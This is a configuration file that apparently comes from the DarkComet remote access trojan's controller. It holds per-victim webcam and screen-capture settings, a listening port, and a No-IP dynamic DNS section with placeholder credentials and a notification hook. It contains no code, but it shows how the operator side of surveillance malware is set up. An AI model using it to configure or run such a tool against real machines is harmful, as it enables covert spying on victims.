[SIN]
disclamer=0
MAXIMIZED=0
Ports=1604:YES|1
REFRESHSINRATIO=45
Tasks=��0
help=0
[{a338a2c0-c89f-11e3-863f-806d6172696f-1085086041}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[{846ee340-7039-11de-9d20-806e6f6e6963-2359048121}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[LSTSIN]
col0=25
col1=70
col2=78
col3=130
col4=76
col5=80
col6=345
col7=0
col8=0
col9=50
col10=50
col11=320
col12=60
col13=100
col14=0
col15=0
col16=60
[SINPOS]
width=1267
height=481
top=63
left=43
[PUSHME]
sig=From DarkComet
api=http://pushme.to/q/widget/export/?hash=yourhash
spin=10
active=0
c1=0
c2=0
c3=0
c4=0
[NOIP]
HOST=yourname.no-ip.org
USER=yourname@yourmail.com
PASS=123456789
AUTO=0
HIDE=1
[{e29ac6c0-7037-11de-816d-806e6f6e6963-2733014181}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{e29ac6c0-7037-11de-816d-806e6f6e6963-4034762045}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
[{bbed3e02-0b41-11e3-8249-806e6f6e6963-1517228949}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=0
SC2QUALITY=45
[{d8932e40-6a6f-11db-b6ab-806e6f6e6963-519775373}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{97e1de52-d6fa-11e1-be62-806e6f6e6963-4209875748}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-79054497}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{3a539840-6a70-11db-887c-806e6f6e6963-406290933}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-1687231242}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{846ee340-7039-11de-9d20-806e6f6e6963-2496548090}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{a37d2f37-0b41-11e3-9bf0-806e6f6e6963-1725675735}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{bbed3e02-0b41-11e3-8249-806e6f6e6963-577784314}]
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[{bbed3e02-0b41-11e3-8249-806e6f6e6963-2967483487}]
SC2QUAL=
SC2OP1=0
SC2OP2=0
SC2OP3=0
SC2OP4=0
SC2SIZE=80
SC2ISIZE=1
SC2QUALITY=45
CAMFREQ=10
CAMQUALITY=50
CAMSTRETCH=1
CAMREC=0
[NOTIFY]
SND=1
